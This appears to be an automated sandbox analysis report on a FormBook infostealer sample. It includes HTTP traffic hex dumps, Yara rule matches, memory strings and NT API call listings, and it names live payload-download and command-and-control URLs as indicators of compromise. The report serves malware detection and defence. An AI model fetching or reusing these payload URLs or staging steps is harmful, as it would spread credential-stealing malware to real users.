        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 25 Apr 2024 17:26:05 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 25 Apr 2024 17:26:08 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 25 Apr 2024 17:26:11 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Thu, 25 Apr 2024 17:26:14 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Apr 2024 17:26:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 7
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, Overfondle.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, Overfondle.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2064998955.0000000005281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
        Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000002.2616564781.0000000002DE1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.n-benriya002.com
        Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000002.2616564781.0000000002DE1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.n-benriya002.com/9pdo/
        Source: Overfondle.exe, 00000008.00000001.1889349329.00000000005F2000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: Overfondle.exe, 00000008.00000001.1889349329.00000000005F2000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: powershell.exe, 00000002.00000002.2064998955.0000000005281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: Overfondle.exe, 00000008.00000003.2065621481.0000000004465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kraljevikonaci.rs/
        Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2170479484.0000000004456000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2063617167.000000000448A000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2170621912.000000000448A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.bin
        Source: Overfondle.exe, 00000008.00000003.2065581113.0000000004487000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065735532.000000000447B000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2063617167.000000000448A000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2170621912.000000000448A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.bin5?
        Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.binY
        Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.bins
        Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
        Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
        Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
        Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
        Source: cmd.exe, 0000000E.00000003.2349353225.0000000007982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
        Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownHTTPS traffic detected: 195.252.110.253:443 -> 192.168.2.10:49706 version: TLS 1.2
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_004054B6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004054B6

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Powershell drops PE file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Overfondle.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_204A2C70
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_204A2DF0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A35C0 NtCreateMutant,LdrInitializeThunk,8_2_204A35C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A4340 NtSetContextThread,8_2_204A4340
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A4650 NtSuspendThread,8_2_204A4650
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2AD0 NtReadFile,8_2_204A2AD0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2AF0 NtWriteFile,8_2_204A2AF0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2AB0 NtWaitForSingleObject,8_2_204A2AB0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2B60 NtClose,8_2_204A2B60
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2BE0 NtQueryValueKey,8_2_204A2BE0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2BF0 NtAllocateVirtualMemory,8_2_204A2BF0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2B80 NtQueryInformationFile,8_2_204A2B80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2BA0 NtEnumerateValueKey,8_2_204A2BA0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2C60 NtCreateKey,8_2_204A2C60
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2C00 NtQueryInformationProcess,8_2_204A2C00
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2CC0 NtQueryVirtualMemory,8_2_204A2CC0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2CF0 NtOpenProcess,8_2_204A2CF0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2CA0 NtQueryInformationToken,8_2_204A2CA0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2D00 NtSetInformationFile,8_2_204A2D00
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2D10 NtMapViewOfSection,8_2_204A2D10
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2D30 NtUnmapViewOfSection,8_2_204A2D30
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2DD0 NtDelayExecution,8_2_204A2DD0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2DB0 NtEnumerateKey,8_2_204A2DB0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2E30 NtWriteVirtualMemory,8_2_204A2E30
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2EE0 NtQueueApcThread,8_2_204A2EE0
